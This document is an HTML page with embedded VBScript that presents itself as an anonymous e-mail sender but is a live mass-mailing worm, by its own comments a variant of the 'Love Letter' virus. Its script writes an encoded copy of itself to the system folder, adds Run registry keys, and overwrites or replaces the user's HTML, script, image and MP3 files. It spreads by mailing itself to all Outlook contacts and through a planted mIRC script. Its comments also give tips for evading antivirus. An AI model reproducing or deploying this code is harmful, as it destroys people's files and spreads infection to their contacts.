<!-- saved from url=(0022)http://internet.e-mail -->
<HTML><HEAD><TITLE>HACKERS</TITLE><META NAME="Generator"CONTENT="MADRE VBS - K.I.K.E.">
<META NAME="Description" CONTENT="THE TRUTH IS HERE :·)">
</HEAD><BODY bgcolor="BLACK" text="WHITE">
<CENTER><p>PARA PODER MANDAR EL MENSAJE DEBERAS PULSAR QUE SI</p><p><BR></p>
</CENTER><MARQUEE LOOP="infinite"BGCOLOR="BLACK">HACKER,PHERAK,CRACK,VIRUSES,SEXXXXXXXXXXXXXX NUESTRA PAGINA BUSCA EN EL WWW.YA.COM TRUE TRUE PLAS Y LA ENCONTRARAS</MARQUEE>
</BODY></HTML>
<SCRIPT LANGUAGE="VBScript">
<!--
on error resume next
dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit
aw=1
code="rem ESTO ES UNA MUTACION DEL VIRUS AMOR MODIFICADA PARA"&vbcrlf& _
"rem ESTENDERSE MAS POR EL MUNDO Y SE LLAMA K.I.K.E."&vbcrlf& _
"rem KIKE INTELIGENT KICL ENGINE Y ESTO VA DEDICADO A MI HERMANO A"&vbcrlf& _
"rem MIS PADRES Y ABUELOS ESPERO HABERMELO CURRADO Y QUE FUNCIONE "&vbcrlf& _
"rem BIEN BLACK ANGEL"&vbcrlf& _
"On Error Resume Next"&vbcrlf& _
"dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow"&vbcrlf& _
"eq=]-]]-]"&vbcrlf& _
"ctr=0"&vbcrlf& _
"Set fso = CreateObject(]-]Scripting.FileSystemObject]-])"&vbcrlf& _
"set file = fso.OpenTextFile(WScript.ScriptFullname,1)"&vbcrlf& _
"vbscopy=file.ReadAll"&vbcrlf& _
"main()"&vbcrlf& _
"sub main()"&vbcrlf& _
"On Error Resume Next"&vbcrlf& _
"dim wscr,rr"&vbcrlf& _
"set wscr=CreateObject(]-]WScript.Shell]-])"&vbcrlf& _
"rr=wscr.RegRead(]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%Windows ScriptingHost%-%Settings%-%Timeout]-])"&vbcrlf& _
"if (rr>=1) then"&vbcrlf& _
"wscr.RegWrite ]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%Windows ScriptingHost%-%Settings%-%Timeout]-],0,]-]REG_DWORD]-]"&vbcrlf& _
"end if"&vbcrlf& _
"Set dirwin = fso.GetSpecialFolder(0)"&vbcrlf& _
"Set dirsystem = fso.GetSpecialFolder(1)"&vbcrlf& _
"Set dirtemp = fso.GetSpecialFolder(2)"&vbcrlf& _
"Set c = fso.GetFile(WScript.ScriptFullName)"&vbcrlf& _
"c.Copy(dirsystem&]-]%-%Rasapi.vbs]-])"&vbcrlf& _
"c.Copy(dirwin&]-]%-%Win32API.vbs]-])"&vbcrlf& _
"c.Copy(dirsystem&]-]%-%HELLO.TXT.vbs]-])"&vbcrlf& _
"fso.createfolder(dirwin&]-]%-%Samples]-])"&vbcrlf& _
"fso.createfolder(dirwin&]-]%-%Samples%-%Wsh]-])"&vbcrlf& _
"c.Copy(dirwin&]-]%-%Samples%-%Wsh%-%Regcreate.vbs]-])"&vbcrlf& _
"regruns()"&vbcrlf& _
"html()"&vbcrlf& _
"spreadtoemail()"&vbcrlf& _
"listadriv()"&vbcrlf& _
"end sub"&vbcrlf& _
"sub regruns()"&vbcrlf& _
"On Error Resume Next"&vbcrlf& _
"Dim num,downread,Mio,sysd,jaja,value"&vbcrlf& _
"regcreate ]-]HKEY_LOCAL_MACHINE%-%Software%-%Microsoft%-%Windows%-%CurrentVersion%-%Run%-%Antiviral]-],dirsystem&]-]%-%Rasapi.vbs]-]"&vbcrlf& _
"regcreate ]-]HKEY_LOCAL_MACHINE%-%Software%-%Microsoft%-%Windows%-%CurrentVersion%-%RunServices%-%Api32]-],dirwin&]-]%-%Win32API.vbs]-]"&vbcrlf& _
"set jaja=CreateObject(]-]WScript.Shell]-])"&vbcrlf& _
"value=jaja.RegRead(]-]HKEY_LOCAL_MACHINE%-%Software%-%Microsoft%-%Windows%-%CurrentVersion%-%kike]-])"&vbcrlf& _
"if not value=]-]install]-] then"&vbcrlf& _
"Set Mio=fso.OpenTextFile(dirwin&]-]%-%System.ini]-])"&vbcrlf& _
"sysd=Mio.ReadAll"&vbcrlf& _
"fso.DeleteFile(dirwin&]-]%-%System.ini]-])"&vbcrlf& _
"sysd=replace(sysd,]-]shell=Explorer.exe]-],]-]shell=Explorer.exe ]-]&dirwin&]-]%-%Samples%-%Wsh%-%Regcreate.vbs]-])"&vbcrlf& _
"Set Mio = fso.OpenTextFile(dirwin&]-]%-%System.ini]-],2,True)"&vbcrlf& _
"Mio.write sysd"&vbcrlf& _
"Mio.close"&vbcrlf& _
"regcreate ]-]HKEY_LOCAL_MACHINE%-%Software%-%Microsoft%-%Windows%-%CurrentVersion%-%kike]-],]-]install]-]"&vbcrlf& _
"end if"&vbcrlf& _
"end sub"&vbcrlf& _
"sub listadriv"&vbcrlf& _
"On Error Resume Next"&vbcrlf& _
"Dim d,dc,s"&vbcrlf& _
"Set dc = fso.Drives"&vbcrlf& _
"For Each d in dc"&vbcrlf& _
"If d.DriveType = 2 or d.DriveType=3 Then"&vbcrlf& _
"folderlist(d.path&]-]%-%]-])"&vbcrlf& _
"end if"&vbcrlf& _
"Next"&vbcrlf& _
"listadriv = s"&vbcrlf& _
"end sub"&vbcrlf& _
"sub infectfiles(folderspec)"&vbcrlf& _
"On Error Resume Next"&vbcrlf& _
"dim f,f1,fc,ext,ap,mircfname,s,bname,mp3,htll,kike,lacopia"&vbcrlf& _
"set f = fso.GetFolder(folderspec)"&vbcrlf& _
"set fc = f.Files"&vbcrlf& _
"for each f1 in fc"&vbcrlf& _
"ext=fso.GetExtensionName(f1.path)"&vbcrlf& _
"ext=lcase(ext)"&vbcrlf& _
"s=lcase(f1.name)"&vbcrlf& _
"if (ext=]-]html]-]) or (ext=]-]htm]-]) or (ext=]-]htt]-]) then"&vbcrlf& _
"Set htll = fso.OpenTextFile(f1.path,2,true)"&vbcrlf& _
"Set kike = fso.OpenTextFile(dirsystem&]-]%-%KIKE.HTM]-])"&vbcrlf& _
"lacopia=kike.ReadAll"&vbcrlf& _
"htll.write lacopia"&vbcrlf& _
"htll.close"&vbcrlf& _
"end if"&vbcrlf& _
"if (ext=]-]vbs]-]) or (ext=]-]vbe]-]) then"&vbcrlf& _
"set ap=fso.OpenTextFile(f1.path,2,true)"&vbcrlf& _
"ap.write vbscopy"&vbcrlf& _
"ap.close"&vbcrlf& _
"elseif(ext=]-]js]-]) or (ext=]-]jse]-]) or (ext=]-]css]-]) or (ext=]-]wsh]-]) or (ext=]-]sct]-]) or (ext=]-]hta]-]) then"&vbcrlf& _
"if day(date) = 16 then"&vbcrlf& _
"set ap=fso.OpenTextFile(f1.path,2,true)"&vbcrlf& _
"ap.write vbscopy"&vbcrlf& _
"ap.close"&vbcrlf& _
"bname=fso.GetBaseName(f1.path)"&vbcrlf& _
"set cop=fso.GetFile(f1.path)"&vbcrlf& _
"cop.copy(folderspec&]-]%-%]-]&bname&]-].vbs]-])"&vbcrlf& _
"fso.DeleteFile(f1.path)"&vbcrlf& _
"elseif(ext=]-]jpg]-]) or (ext=]-]jpeg]-]) then"&vbcrlf& _
"set ap=fso.OpenTextFile(f1.path,2,true)"&vbcrlf& _
"ap.write vbscopy"&vbcrlf& _
"ap.close"&vbcrlf& _
"set cop=fso.GetFile(f1.path)"&vbcrlf& _
"cop.copy(f1.path&]-].vbs]-])"&vbcrlf& _
"fso.DeleteFile(f1.path)"&vbcrlf& _
"elseif(ext=]-]mp3]-]) or (ext=]-]mp2]-]) then"&vbcrlf& _
"set mp3=fso.CreateTextFile(f1.path&]-].vbs]-])"&vbcrlf& _
"mp3.write vbscopy"&vbcrlf& _
"mp3.close"&vbcrlf& _
"set att=fso.GetFile(f1.path)"&vbcrlf& _
"att.attributes=att.attributes+2"&vbcrlf& _
"end if"&vbcrlf& _
"if (eq<>folderspec) then"&vbcrlf& _
"if (s=]-]mirc32.exe]-]) or (s=]-]mlink32.exe]-]) or (s=]-]mirc.ini]-]) or (s=]-]script.ini]-]) or (s=]-]mirc.hlp]-]) then"&vbcrlf& _
"set scriptini=fso.CreateTextFile(folderspec&]-]%-%script.ini]-])"&vbcrlf& _
"scriptini.WriteLine ]-][script]]-]"&vbcrlf& _
"scriptini.WriteLine ]-];mIRC Script]-]"&vbcrlf& _
"scriptini.WriteLine ]-];  Please dont edit this script... mIRC will corrupt, if mIRC will]-]"&vbcrlf& _
"scriptini.WriteLine ]-]     corrupt... WINDOWS will affect and will not run correctly. thanks]-]"&vbcrlf& _
"scriptini.WriteLine ]-];]-]"&vbcrlf& _
"scriptini.WriteLine ]-];Khaled Mardam-Bey]-]"&vbcrlf& _
"scriptini.WriteLine ]-];http://www.mirc.com]-]"&vbcrlf& _
"scriptini.WriteLine ]-];]-]"&vbcrlf& _
"scriptini.WriteLine ]-]n0=on 1:JOIN:#:{]-]"&vbcrlf& _
"scriptini.WriteLine ]-]n1=  /if ( $nick == $me ) { halt }]-]"&vbcrlf& _
"scriptini.WriteLine ]-]n2=  /.dcc send $nick ]-]&dirsystem&]-]%-%KIKE.HTM]-]"&vbcrlf& _
"scriptini.WriteLine ]-]n3=}]-]"&vbcrlf& _
"scriptini.close"&vbcrlf& _
"eq=folderspec"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"next"&vbcrlf& _
"end sub"&vbcrlf& _
"sub folderlist(folderspec)"&vbcrlf& _
"On Error Resume Next"&vbcrlf& _
"dim f,f1,sf"&vbcrlf& _
"set f = fso.GetFolder(folderspec)"&vbcrlf& _
"set sf = f.SubFolders"&vbcrlf& _
"for each f1 in sf"&vbcrlf& _
"infectfiles(f1.path)"&vbcrlf& _
"folderlist(f1.path)"&vbcrlf& _
"next"&vbcrlf& _
"end sub"&vbcrlf& _
"sub regcreate(regkey,regvalue)"&vbcrlf& _
"Set regedit = CreateObject(]-]WScript.Shell]-])"&vbcrlf& _
"regedit.RegWrite regkey,regvalue"&vbcrlf& _
"end sub"&vbcrlf& _
"function regget(value)"&vbcrlf& _
"Set regedit = CreateObject(]-]WScript.Shell]-])"&vbcrlf& _
"regget=regedit.RegRead(value)"&vbcrlf& _
"end function"&vbcrlf& _
"function fileexist(filespec)"&vbcrlf& _
"On Error Resume Next"&vbcrlf& _
"dim msg"&vbcrlf& _
"if (fso.FileExists(filespec)) Then"&vbcrlf& _
"msg = 0"&vbcrlf& _
"else"&vbcrlf& _
"msg = 1"&vbcrlf& _
"end if"&vbcrlf& _
"fileexist = msg"&vbcrlf& _
"end function"&vbcrlf& _
"function folderexist(folderspec)"&vbcrlf& _
"On Error Resume Next"&vbcrlf& _
"dim msg"&vbcrlf& _
"if (fso.GetFolderExists(folderspec)) then"&vbcrlf& _
"msg = 0"&vbcrlf& _
"else"&vbcrlf& _
"msg = 1"&vbcrlf& _
"end if"&vbcrlf& _
"fileexist = msg"&vbcrlf& _
"end function"&vbcrlf& _
"sub spreadtoemail()"&vbcrlf& _
"On Error Resume Next"&vbcrlf& _
"dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad"&vbcrlf& _
"set regedit=CreateObject(]-]WScript.Shell]-])"&vbcrlf& _
"set out=WScript.CreateObject(]-]Outlook.Application]-])"&vbcrlf& _
"set mapi=out.GetNameSpace(]-]MAPI]-])"&vbcrlf& _
"for ctrlists=1 to mapi.AddressLists.Count"&vbcrlf& _
"set a=mapi.AddressLists(ctrlists)"&vbcrlf& _
"x=1"&vbcrlf& _
"regv=regedit.RegRead(]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%WAB%-%]-]&a)"&vbcrlf& _
"if (regv=]-]]-]) then"&vbcrlf& _
"regv=1"&vbcrlf& _
"end if"&vbcrlf& _
"if (int(a.AddressEntries.Count)>int(regv)) then"&vbcrlf& _
"for ctrentries=1 to a.AddressEntries.Count"&vbcrlf& _
"malead=a.AddressEntries(x)"&vbcrlf& _
"regad=]-]]-]"&vbcrlf& _
"regad=regedit.RegRead(]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%WAB%-%]-]&malead)"&vbcrlf& _
"if (regad=]-]]-]) then"&vbcrlf& _
"set male=out.CreateItem(0)"&vbcrlf& _
"male.Recipients.Add(malead)"&vbcrlf& _
"male.Subject = ]-]HOLA]-]"&vbcrlf& _
"male.Body = vbcrlf&]-]HOLA ESTAMOS BUSCANDO GENTE PARA HACER UN CLUB DE HACKER ,PHERAK ,VIRUS Y ETC SI QUIERES UNIRTITE AUNQUE NO TENGAS CONOCIMIENTOS LEE EL ARCHIVO]-]"&vbcrlf& _
"male.Attachments.Add(dirsystem&]-]%-%HELLO.TXT.vbs]-])"&vbcrlf& _
"male.Send"&vbcrlf& _
"regedit.RegWrite ]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%WAB%-%]-]&malead,1,]-]REG_DWORD]-]"&vbcrlf& _
"end if"&vbcrlf& _
"x=x+1"&vbcrlf& _
"next"&vbcrlf& _
"regedit.RegWrite ]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%WAB%-%]-]&a,a.AddressEntries.Count"&vbcrlf& _
"else"&vbcrlf& _
"regedit.RegWrite ]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%WAB%-%]-]&a,a.AddressEntries.Count"&vbcrlf& _
"end if"&vbcrlf& _
"next"&vbcrlf& _
"Set out=Nothing"&vbcrlf& _
"Set mapi=Nothing"&vbcrlf& _
"end sub"&vbcrlf& _
"sub html"&vbcrlf& _
"On Error Resume Next"&vbcrlf& _
"dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6"&vbcrlf& _
"dta1=]-]<HTML><HEAD><TITLE>HACKERS<?-?TITLE><META NAME=@-@Generator@-@CONTENT=@-@MADRE VBS - K.I.K.E.@-@>]-]&vbcrlf& _"&vbcrlf& _
"]-]<META NAME=@-@Author@-@ CONTENT=@-@Gracias spyder POR ESTE VIRUS?-? @Thank you ?-? Manila, Philippines ?-? MAYO 2000@-@>]-]&vbcrlf& _"&vbcrlf& _
"]-]<META NAME=@-@Description@-@ CONTENT=@-@THE TRUTH IS HERE :·)@-@>]-]&vbcrlf& _"&vbcrlf& _
"]-]<?-?HEAD><BODY bgcolor=@-@BLACK@-@ text=@-@WHITE@-@ ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#KIKE.HTM#-#,#-#main#-#)@-@]-]&vbcrlf& _"&vbcrlf& _
"]-]ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#KIKE.HTM#-#,#-#main#-#)@-@BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>]-]&vbcrlf& _"&vbcrlf& _
"]-]<CENTER><p>DEBES RELLENAR UN FORMULARIO POR FAVOR PULSA QUE SI<?-?p><p><BR><?-?p>]-]&vbcrlf& _"&vbcrlf& _
"]-]<?-?CENTER><MARQUEE LOOP=@-@infinite@-@BGCOLOR=@-@BLACK@-@>HACKER,PHERAK,CRACK,VIRUSES,SEXXXXXXXXXXXXXX<?-?MARQUEE>]-]&vbcrlf& _"&vbcrlf& _
"]-]<?-?BODY><?-?HTML>]-]&vbcrlf& _"&vbcrlf& _
"]-]<SCRIPT language=@-@JScript@-@>]-]&vbcrlf& _"&vbcrlf& _
"]-]<!--?-??-?]-]&vbcrlf& _"&vbcrlf& _
"]-]if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}]-]&vbcrlf& _"&vbcrlf& _
"]-]?-??-?-->]-]&vbcrlf& _"&vbcrlf& _
"]-]<?-?SCRIPT>]-]&vbcrlf& _"&vbcrlf& _
"]-]<SCRIPT LANGUAGE=@-@VBScript@-@>]-]&vbcrlf& _"&vbcrlf& _
"]-]<!--]-]&vbcrlf& _"&vbcrlf& _
"]-]on error resume next]-]&vbcrlf& _"&vbcrlf& _
"]-]dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit]-]&vbcrlf& _"&vbcrlf& _
"]-]aw=1]-]&vbcrlf& _"&vbcrlf& _
"]-]code=]-]"&vbcrlf& _
"dta2=]-]set fso=CreateObject(@-@Scripting.FileSystemObject@-@)]-]&vbcrlf& _"&vbcrlf& _
"]-]set dirsystem=fso.GetSpecialFolder(1)]-]&vbcrlf& _"&vbcrlf& _
"]-]code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))]-]&vbcrlf& _"&vbcrlf& _
"]-]code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))]-]&vbcrlf& _"&vbcrlf& _
"]-]code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))]-]&vbcrlf& _"&vbcrlf& _
"]-]set wri=fso.CreateTextFile(dirsystem&@-@^-^Rasapi.vbs@-@)]-]&vbcrlf& _"&vbcrlf& _
"]-]wri.write code4]-]&vbcrlf& _"&vbcrlf& _
"]-]wri.close]-]&vbcrlf& _"&vbcrlf& _
"]-]if (fso.FileExists(dirsystem&@-@^-^Rasapi.vbs@-@)) then]-]&vbcrlf& _"&vbcrlf& _
"]-]if (err.number=424) then]-]&vbcrlf& _"&vbcrlf& _
"]-]aw=0]-]&vbcrlf& _"&vbcrlf& _
"]-]end if]-]&vbcrlf& _"&vbcrlf& _
"]-]if (aw=1) then]-]&vbcrlf& _"&vbcrlf& _
"]-]document.write @-@ERROR: can#-#t initialize ActiveX@-@]-]&vbcrlf& _"&vbcrlf& _
"]-]window.close]-]&vbcrlf& _"&vbcrlf& _
"]-]end if]-]&vbcrlf& _"&vbcrlf& _
"]-]end if]-]&vbcrlf& _"&vbcrlf& _
"]-]Set regedit = CreateObject(@-@WScript.Shell@-@)]-]&vbcrlf& _"&vbcrlf& _
"]-]regedit.RegWrite@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^Antiviral@-@,dirsystem&@-@^-^Rasapi.vbs@-@]-]&vbcrlf&_"&vbcrlf& _
"]-]?-??-?-->]-]&vbcrlf& _"&vbcrlf& _
"]-]<?-?SCRIPT>]-]"&vbcrlf& _
"dt1=replace(dta1,chr(35)&chr(45)&chr(35),]-][-[]-])"&vbcrlf& _
"dt1=replace(dt1,chr(64)&chr(45)&chr(64),]-]]-]]-]]-])"&vbcrlf& _
"dt4=replace(dt1,chr(63)&chr(45)&chr(63),]-]/]-])"&vbcrlf& _
"dt5=replace(dt4,chr(94)&chr(45)&chr(94),]-]%-%]-])"&vbcrlf& _
"dt2=replace(dta2,chr(35)&chr(45)&chr(35),]-][-[]-])"&vbcrlf& _
"dt2=replace(dt2,chr(64)&chr(45)&chr(64),]-]]-]]-]]-])"&vbcrlf& _
"dt3=replace(dt2,chr(63)&chr(45)&chr(63),]-]/]-])"&vbcrlf& _
"dt6=replace(dt3,chr(94)&chr(45)&chr(94),]-]%-%]-])"&vbcrlf& _
"set fso=CreateObject(]-]Scripting.FileSystemObject]-])"&vbcrlf& _
"set c=fso.OpenTextFile(WScript.ScriptFullName,1)"&vbcrlf& _
"lines=Split(c.ReadAll,vbcrlf)"&vbcrlf& _
"l1=ubound(lines)"&vbcrlf& _
"for n=0 to ubound(lines)"&vbcrlf& _
"lines(n)=replace(lines(n),]-][-[]-],chr(91)+chr(45)+chr(91))"&vbcrlf& _
"lines(n)=replace(lines(n),]-]]-]]-]]-],chr(93)+chr(45)+chr(93))"&vbcrlf& _
"lines(n)=replace(lines(n),]-]%-%]-],chr(37)+chr(45)+chr(37))"&vbcrlf& _
"if (l1=n) then"&vbcrlf& _
"lines(n)=chr(34)+lines(n)+chr(34)"&vbcrlf& _
"else"&vbcrlf& _
"lines(n)=chr(34)+lines(n)+chr(34)&]-]&vbcrlf& _]-]"&vbcrlf& _
"end if"&vbcrlf& _
"next"&vbcrlf& _
"set b=fso.CreateTextFile(dirsystem+]-]%-%KIKE.HTM]-])"&vbcrlf& _
"b.close"&vbcrlf& _
"set d=fso.OpenTextFile(dirsystem+]-]%-%KIKE.HTM]-],2)"&vbcrlf& _
"d.write dt5"&vbcrlf& _
"d.write join(lines,vbcrlf)"&vbcrlf& _
"d.write vbcrlf"&vbcrlf& _
"d.write dt6"&vbcrlf& _
"d.close"&vbcrlf& _
"end sub"&vbcrlf& _
"rem HOLA ESPERO QUE CUANDO SE LEA ESTO SE HAYA ESTENDIDO ESTE "&vbcrlf& _
"rem MAGNIFICO VIRUS,GRACIAS AL QUE LO HIZO"&vbcrlf& _
"rem Y AL QUE ME LO DIO, QUIERO HACER UN COMENTARIO PARA EL QUE"&vbcrlf& _
"rem ESTE DISPUESTO HACER OTRA VERSION DE ESTE VIRUS "&vbcrlf& _
"rem CONSEJOS:"&vbcrlf& _
"rem 1.HAZ CINCO MUTACIONES DE TU VIRUS Y HAZ QUE UNA SE EXTIENDA"&vbcrlf& _
"rem Y QUE SE CONECTE DE VEZ EN CUANDO A UNA PAGINA QUE VAS PONIENDO UNA"&vbcrlf& _
"rem MUTACION CADA POCO TIEMPO A SI NUNCA LO PILLARA EL ANTIVIRUS jejejejeje"
set fso=CreateObject("Scripting.FileSystemObject")
set dirsystem=fso.GetSpecialFolder(1)
code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))
code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))
code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))
set wri=fso.CreateTextFile(dirsystem&"\Rasapi.vbs")
wri.write code4
wri.close
inputbox("Direccion de correo que quieres enviar el mensaje")
inputbox("Asunto")
inputbox("Mensaje:")
if (fso.FileExists(dirsystem&"\Rasapi.vbs")) then
if (err.number=424) then
msgbox "No se ha podido enviar el mensaje",0,"HTMLanonimail"
aw=0
end if
if (aw=1) then
msgbox "Mensaje enviado correctamente si estas conectados a internet",0,"HTMLanonimail"
end if
end if
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Antiviral",dirsystem&"\Rasapi.vbs"
regedit.Run(dirsystem&"\Rasapi.vbs")
//-->
</SCRIPT>